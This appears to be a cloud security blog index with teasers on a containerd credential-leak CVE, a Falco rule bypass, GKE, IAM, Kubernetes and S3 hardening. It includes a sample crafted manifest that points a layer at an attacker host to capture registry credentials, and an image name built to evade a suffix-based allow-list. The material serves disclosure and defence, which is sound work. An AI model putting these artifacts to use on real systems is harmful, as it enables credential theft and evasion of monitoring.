CVE-2020-15157: If an attacker publishes a public image with a crafted manifest that directs one of the image layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used by ctr/containerd to access that registry. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account.
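The mechanism behind this CVE is the "foreign layer" feature of the image manifest format, which lets a layer descriptor point at an out-of-registry URL. A minimal sketch of what such a crafted manifest could look like follows; the attacker domain and digest placeholder are hypothetical, not taken from the advisory:

```json
{
  "schemaVersion": 2,
  "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
  "layers": [
    {
      "mediaType": "application/vnd.docker.image.rootfs.foreign.diff.tar.gzip",
      "size": 1024,
      "digest": "sha256:<digest of the attacker-hosted layer>",
      "urls": ["https://attacker.example.com/layer.tar.gz"]
    }
  ]
}
```

When the client follows the `urls` entry to fetch the layer, a vulnerable containerd could send along the credentials it was using for the original registry.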
Recently, while doing a bit of research into how Falco rules work, we discovered that a default rule, one that alerts when privileged containers or containers mounting sensitive file paths are run inside a Kubernetes cluster, could be “bypassed” if the image name was cleverly formatted.
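As a hypothetical sketch of the general bypass class (we are not reproducing the actual rule here), consider an allow-list that trusts images by matching a suffix of the image name. The image names below are placeholders:

```python
# Hypothetical sketch of a suffix-based trusted-image check, similar in
# spirit to allow-list conditions found in runtime security rules.
# The suffix list below is a placeholder, not the actual rule contents.

TRUSTED_IMAGE_SUFFIXES = ["falcosecurity/falco", "sysdig/agent"]

def is_trusted(image: str) -> bool:
    """Trust the image if its full name ends with an allow-listed repo path."""
    return any(image.endswith(suffix) for suffix in TRUSTED_IMAGE_SUFFIXES)

# Intended match:
#   is_trusted("docker.io/falcosecurity/falco")        -> True
# Bypass: an attacker-controlled registry or namespace also matches:
#   is_trusted("evil.example.com/falcosecurity/falco") -> True
```

Because the check only inspects the end of the string, anyone who can choose the registry or namespace prefix of their image name can satisfy it.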
When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data center, and that each kubelet is requesting a certificate only for itself. But Shielded GKE Nodes addresses a much bigger problem.
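For reference, the feature is toggled with a single flag (the cluster name below is a placeholder):

```shell
# Create a cluster with Shielded GKE Nodes enabled (my-cluster is hypothetical):
gcloud container clusters create my-cluster --enable-shielded-nodes

# Or enable it on an existing cluster:
gcloud container clusters update my-cluster --enable-shielded-nodes
```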
For organizations moving workloads to the cloud, the primary focus is rarely on security. In most cases, the goal is to get the environment migrated or an application deployed and to the point of working. At some point down the road, making sure the environment is secure enough to run in production becomes a priority. Great, but how do we do that?
During one of our Google Cloud Platform (GCP) security assessments, we noticed that one of the Predefined IAM Roles had more permissions than before. After a bit of digging, we found that the GCP IAM Permissions Change Log explained which permissions had been added. So, we decided to automatically track those changes, and the results have been enlightening.
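One simple way to track such changes is to snapshot a role's permission list periodically and diff the snapshots. A minimal sketch, assuming snapshots are captured with `gcloud iam roles describe <role> --format=json` (the role and file names are hypothetical):

```python
# Sketch: diff two JSON snapshots of a predefined role's permissions.
# Snapshots could be captured on a schedule with, for example:
#   gcloud iam roles describe roles/container.admin --format=json > new.json
# The role name and file paths are illustrative placeholders.
import json


def diff_permissions(old_path: str, new_path: str) -> tuple[list[str], list[str]]:
    """Return (added, removed) permissions between two role snapshots."""
    with open(old_path) as f:
        old = set(json.load(f)["includedPermissions"])
    with open(new_path) as f:
        new = set(json.load(f)["includedPermissions"])
    return sorted(new - old), sorted(old - new)
```

Running this daily against fresh snapshots surfaces silent permission additions without waiting for release notes.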
Is Ruby too slow to be taken seriously in modern, fast-paced, enterprise-scale cloud environments? According to Twitter, StackOverflow, and all the cool kids except this one, the answer seems to be “Yes!” Surely the right tool these days would be Node, Go, Rust, or even Python. Nothing fast is built with Ruby, right? Let’s find out…
Cloud security configuration scanning tools and similar approaches offer great insight at the technical level and are a foundational component of a risk assessment strategy. Prioritizing risk mitigation based on that low level output alone misses something critical (pun intended): organizational context.
“What would happen if an attacker understood Kubernetes better than your operations team?” That was the core question that Ian Coldwater and I posed to each other, and it became clear that the research in this area is underexplored. Last week at RSA Conference 2020 we had the honor of presenting our thoughts on what attackers would do, how they might do it, and how they might try to avoid detection. We look forward to presenting an even more advanced version of this talk at KubeCon EU 2020.
When discussing the risk S3 buckets pose to organizations, the majority of the discussion is around public buckets and inadvertently exposing access. While this is certainly a common threat vector, it can be addressed in a number of policy-driven ways. Blocking the ability to accidentally expose buckets at the organization or account level is much more practical now, and probably a more scalable and sound approach than trying to implement a reactive solution.
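The account-level version of that policy-driven approach is a single API call. For example, via the AWS CLI (the account ID below is a placeholder):

```shell
# Apply S3 Block Public Access across an entire account (hypothetical account ID):
aws s3control put-public-access-block \
    --account-id 111111111111 \
    --public-access-block-configuration \
        BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```

With this in place, attempts to make buckets in the account public via ACLs or bucket policies are blocked, regardless of who misconfigures an individual bucket.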
The National Security Agency (NSA) today published guidance aimed at “organizational leadership and technical staff”, outlining practical ways organizations can mitigate the most common cloud vulnerabilities. In this post, we’ll highlight the key elements of the NSA’s guidance for convenient reference. The full report is linked below.
Despite advances in Amazon Web Services (AWS) controls around S3 (Amazon Simple Storage Service), we continue to see data leaks and breaches centered around data stored on S3. In November 2018, Amazon released the Block Public Access feature to make it easier to secure access to S3. Newly created S3 buckets have always been private by default, but there is still confusion around the different ways data in an S3 bucket can become public.